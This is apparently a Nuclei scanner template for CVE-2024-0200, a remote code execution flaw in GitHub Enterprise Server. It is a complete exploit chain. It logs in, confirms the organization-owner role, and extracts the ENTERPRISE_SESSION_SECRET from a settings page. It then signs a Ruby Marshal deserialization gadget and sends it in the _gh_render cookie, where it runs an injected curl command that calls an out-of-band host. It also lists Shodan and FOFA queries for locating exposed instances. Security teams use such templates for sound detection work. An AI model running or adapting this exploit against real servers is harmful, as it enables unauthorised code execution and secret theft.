id: CVE-2024-0200 info: name: Github Enterprise Authenticated Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. reference: - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/ - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/ - https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5 - https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3 - https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0200 cwe-id: CWE-470 epss-score: 0.06844 epss-percentile: 0.93885 cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 7 vendor: github product: "enterprise_server" shodan-query: - "title:\"GitHub Enterprise\"" - micro focus dsd fofa-query: "app=\"Github-Enterprise\"" tags: cve,cve2024,rce,github,enterprise variables: username: "{{username}}" password: "{{password}}" oast: "curl {{interactsh-url}}/?" padstr: "{{randstr}}" payload: '{{padding(oast,padstr,300)}}' marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT' b64_marshal_data: "{{base64(url_decode(marshal_data))}}" digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}" final_payoad: "{{ b64_marshal_data + '--' + digest}}" http: - method: GET path: - "{{BaseURL}}/api/v3/user/orgs" headers: Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" extractors: - type: json part: body name: org_name internal: true json: - ".[].login" - method: GET path: - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}" headers: Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" matchers-condition: and matchers: - type: word words: - '"role": "admin"' part: body - method: POST path: - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos" headers: Content-Type: application/json Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" body: | { "name": "{{randstr}}" } matchers: - type: status status: - 201 - method: GET cookie-reuse: true path: - "{{BaseURL}}/login" extractors: - type: regex part: body internal: true group: 1 regex: - 'name="authenticity_token" value="(.*?)"' name: csrf_token - method: POST path: - "{{BaseURL}}/session" headers: Content-Type: application/x-www-form-urlencoded body: | login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}& matchers: - type: status status: - 302 - type: word words: - "_gh_render" part: header - method: GET path: - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck" extractors: - type: regex group: 1 name: ghe_secret internal: true regex: - '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"' part: body matchers: - type: word words: - 'ENTERPRISE_SESSION_SECRET' part: body - method: GET path: - "{{BaseURL}}/" headers: Cookie: _gh_render={{final_payoad}} matchers-condition: and matchers: - type: status status: - 500 - type: word part: interactsh_protocol words: - "dns" # digest: 490a0046304402202af9825ce4c628dd737cd0ccc55a5e21eacfe2fe5bfd7774cd9beb496823ff1902200709cad5ee85816fd669fb420ec1ad81f9fc45674917637775df828d1d3c24c2:922c64590222798bb761d5b6d8e72950